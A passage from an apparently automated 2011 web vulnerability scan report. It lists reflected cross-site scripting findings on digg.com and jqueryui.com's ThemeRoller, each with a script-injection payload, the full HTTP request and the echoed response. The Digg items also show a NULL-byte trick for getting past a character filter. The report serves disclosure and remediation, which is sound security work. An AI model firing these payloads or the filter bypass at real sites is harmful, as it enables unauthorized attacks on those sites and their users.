Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 18272

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%0034ebf"><script>alert(1)</script>07ed2e5f09b?phase=2&url=https://www.microsoft.com/presspass/presskits/DCU/default.aspx.rss">
...[SNIP]...

2.23. http://digg.com/topic [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /topic

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006361e"><script>alert(1)</script>13807bfb062 was submitted in the REST URL parameter 1. This input was echoed as 6361e"><script>alert(1)</script>13807bfb062 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /topic%006361e"><script>alert(1)</script>13807bfb062 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=220732 10.2.130.26
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18112

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/topic%006361e"><script>alert(1)</script>13807bfb062.rss">
...[SNIP]...

2.24. http://digg.com/upcoming [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /upcoming

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d52d9"><script>alert(1)</script>0f1d8b4e8f1 was submitted in the REST URL parameter 1. This input was echoed as d52d9"><script>alert(1)</script>0f1d8b4e8f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /upcoming%00d52d9"><script>alert(1)</script>0f1d8b4e8f1 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=193751 10.2.130.26
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18118

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/upcoming%00d52d9"><script>alert(1)</script>0f1d8b4e8f1.rss">
...[SNIP]...

2.25. http://jqueryui.com/themeroller/ [bgColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50e92"><script>alert(1)</script>67aee4135f0 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada50e92"><script>alert(1)</script>67aee4135f0&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada50e92"><script>alert(1)</script>67aee4135f0&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighligh
...[SNIP]...

2.26. http://jqueryui.com/themeroller/ [bgColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62918"><script>alert(1)</script>0f9411eb6e5 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=00000062918"><script>alert(1)</script>0f9411eb6e5&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
l&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=00000062918"><script>alert(1)</script>0f9411eb6e5&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=
...[SNIP]...

2.27. http://jqueryui.com/themeroller/ [bgColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0998"><script>alert(1)</script>a72e36b6181 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8Fa0998"><script>alert(1)</script>a72e36b6181&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8Fa0998"><script>alert(1)</script>a72e36b6181&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHo
...[SNIP]...

2.28. http://jqueryui.com/themeroller/ [bgColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be25c"><script>alert(1)</script>a29993d1aed was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ecbe25c"><script>alert(1)</script>a29993d1aed&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
0000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ecbe25c"><script>alert(1)</script>a29993d1aed&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverl
...[SNIP]...

2.29. http://jqueryui.com/themeroller/ [bgColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca387"><script>alert(1)</script>d58ea5446de was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadadaca387"><script>alert(1)</script>d58ea5446de&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadadaca387"><script>alert(1)</script>d58ea5446de&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&bo
...[SNIP]...

2.30. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7fa2"><script>alert(1)</script>ef87dfaa078 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9eee7fa2"><script>alert(1)</script>ef87dfaa078&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ver=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9eee7fa2"><script>alert(1)</script>ef87dfaa078&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError
...[SNIP]...

2.31. http://jqueryui.com/themeroller/ [bgColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbcfa"><script>alert(1)</script>b9131c7690b was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadadafbcfa"><script>alert(1)</script>b9131c7690b&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadadafbcfa"><script>alert(1)</script>b9131c7690b&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&
...[SNIP]...

2.32. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6d67"><script>alert(1)</script>7e0b5c6406d was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaae6d67"><script>alert(1)</script>7e0b5c6406d&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaae6d67"><script>alert(1)</script>7e0b5c6406d&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&off
...[SNIP]...

2.33. http://jqueryui.com/themeroller/ [bgColorShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

